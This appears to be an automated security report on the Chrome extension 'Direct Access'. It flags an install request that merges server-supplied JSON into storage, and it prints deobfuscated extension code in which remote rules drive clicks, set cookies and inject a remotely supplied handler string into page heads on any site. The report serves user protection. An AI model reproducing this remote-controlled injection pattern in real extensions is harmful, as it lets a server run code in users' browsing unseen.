Is Direct Access safe?

Medium risk

Accès-Direct is medium risk. Direct Access GETs accesdirectapp.com/installation during install (HTTP 200) and merges returned JSON keys into local storage alongside defaults like the action-list URL and cookie-banner settings. The listing covers cookie automation only.

maurellelagacev0.0.1Chrome Web Store
47Risk

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

Installation request stores remote settings

Direct Access GETs accesdirectapp.com/installation during install (HTTP 200) and merges returned JSON keys into local storage alongside defaults like the action-list URL and cookie-banner settings.

The listing covers cookie automation only.

Severity
Medium unwanted
Type
Unexpected
CWE
CWE-359
Source
Dynamic sandbox
What actually happens
You did this

You install Direct Access in Chrome.

The extension did this

The extension contacts an installation endpoint and stores the returned JSON for later automation.

The storage write combines built-in defaults with every key returned by the server.

Captured request
GEThttps://www.accesdirectapp.com/installation

HTTP 200 observed during dynamic analysis.

Stored settings accepted by the install flow
  • Response approval flag
    true

    Lets the remote response decide whether the extension stores the returned settings and continues loading action definitions.

  • Action-list source
    https://raw.githubusercontent.com/accesdirect/app/main/actions.json

    Controls where the extension downloads the website-specific rules it later applies while you browse.

  • Stored install identifier
    7b6a0c34-8a84-4d4e-8ef2-0d6e880a0f24 (illustrative)

    Can give the stored settings a per-install value if the server includes one in the JSON response.

  • Default action choice
    refuse

    Controls whether the extension tries to refuse, accept, or skip cookie-banner choices on supported sites.

  • Cookie-setting rules
    cookie_consent=refused (illustrative)

    Can tell the page script to set a named browser cookie for a matching website.

The code that does this

The install handler stores the full JSON response

Readable version

Deobfuscated install request and storage write

app/main/worker.js
chrome.runtime.onInstalled.addListener(async (details) => {    try {        if (details.reason == "install") {            const appSettings = {                actionsURL: 'https://raw.githubusercontent.com/accesdirect/app/main/actions.json',                actions: [],                enabled: {},                selectedAction: 'refuse',                acceptIfRefuseNotAvailable: true,            };            const fetchResponse = await fetch("https://www.accesdirectapp.com/installation");            if (fetchResponse?.status === 200) {                const json = await fetchResponse.json();                if (json && json.status) {                    chrome.storage.local.set({ ...appSettings, ...json });                    fetchingActions();                }            }        }    } catch (e) {        console.error(e);    }});

Deobfuscated follow-up action-list fetch

app/main/worker.js
const fetchingActions = () => {    chrome.storage.local.get(['id', 'actionsURL'], async (storage) => {        if (storage?.actionsURL) {            const fetchResponse = await fetch(`${storage.actionsURL}`);            if (fetchResponse?.status === 200) {                const text = await fetchResponse.text();                const json = JSON.parse(text);                if (json) {                    storage.actions = actionMerger(storage.actions, json.actions);                }                chrome.storage.local.set({ actions: storage.actions });            }        }    });}
The code that does this

Stored settings are later used on visited pages

Readable version

Deobfuscated content-script storage read

app/main/linker.js
chrome.storage.local.get(['actions', 'selectedAction', 'acceptIfRefuseNotAvailable', 'cookies'], (storage) => {    let added = false;    if (window.self === window.top) {        const addActionsHandler = () => {            if (!added) {                added = true;                const s = document.createElement('script');                s.src = chrome.runtime.getURL('/app/web/actionsHandler.js');                document.body.appendChild(s);            }        };        const winHostname = window.location.hostname;        const host = winHostname.indexOf('www.') === 0 ? winHostname.substring(4) : winHostname;        if (storage.actions?.[host]) {            addActionsHandler();            window.addEventListener('message', (m) => {                if (m.data === 'waitForActions') {                    window.postMessage({                        dataType: 'hostActions',                        host: host,                        actions: storage.actions?.[host].actions,                        cookies: storage.cookies?.[host],                        selectedAction: storage.selectedAction,                        enabled: storage.enabled,                        acceptIfRefuseNotAvailable: storage.acceptIfRefuseNotAvailable                    }, '*');                }            });        }        chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {            if (message.message === "add-user-action") {                if (document.querySelectorAll(message.selector)?.[message.indexSelector]) {                    addActionsHandler();                    sendResponse({ status: true });                } else {                    sendResponse({ status: false });                }            }        });    }});

Deobfuscated page-script action handler

app/web/actionsHandler.js
const actionHandler = (actionData) => {    const host = actionData.host;    const actions = actionData.actions;    const userAction = actions.userAction;    let selectedAction = userAction ? userAction : actions[actionData.selectedAction];    const acceptIfRefuseNotAvailable = actionData.acceptIfRefuseNotAvailable;    if (acceptIfRefuseNotAvailable && !userAction && actionData.selectedAction === 'refuse' && selectedAction === null && actions.accept) {        selectedAction = actions.accept;    }    const postClickHandler = selectedAction?.postClickHandler ? selectedAction?.postClickHandler : '';    const postClickHandlerRange = doc.createRange();    const index = selectedAction?.index !== undefined ? selectedAction?.index : 0;    if ((actionData.enabled && actionData.enabled[host] !== undefined ? actionData.enabled[host] : true) || userAction) {        switch (selectedAction?.type) {            case 'scroll':                const element = doc.querySelectorAll(selectedAction.selector)?.[index];                if (element) {                    element.scrollTo(selectedAction.scrollX, selectedAction.scrollY);                }                break;            case 'click':                clickAction(selectedAction.selector, index);                doc.head.appendChild(postClickHandlerRange['createContextualFragment'](postClickHandler));                break;            case 'multiple':                for (const selectorData of selectedAction.selectors) {                    if (selectorData.type === 'click') {                        clickAction(selectorData.selector, index);                    }                }                break;        }        if (actionData.cookies?.name?.length > 0) {            const name = actionData.cookies.name;            const value = actionData.cookies.value;            const days = 30;            let expires = '';            if (days) {                const date = new Date();                date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));                expires = `; expires=${date.toUTCString()}`;            }            doc.cookie = name + "=" + (value || "") + expires + "; path=/";        }    }}
Remote hosts involved in the install and refresh flow
    • www.accesdirectapp.com

    Receives the installation request and returns JSON that the extension stores locally.

    • raw.githubusercontent.com

    Default source for action definitions loaded after the installation response is stored.

What it can do

Permissions this extension asks for, as declared in version 0.0.1. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on every site you visit

    <all_urls>

  • Store data in your browser

    storage

  • Schedule its own background tasks

    alarms

Updated 30 September 2026cfoedhohfjhgogacpcpkphmhemmabjod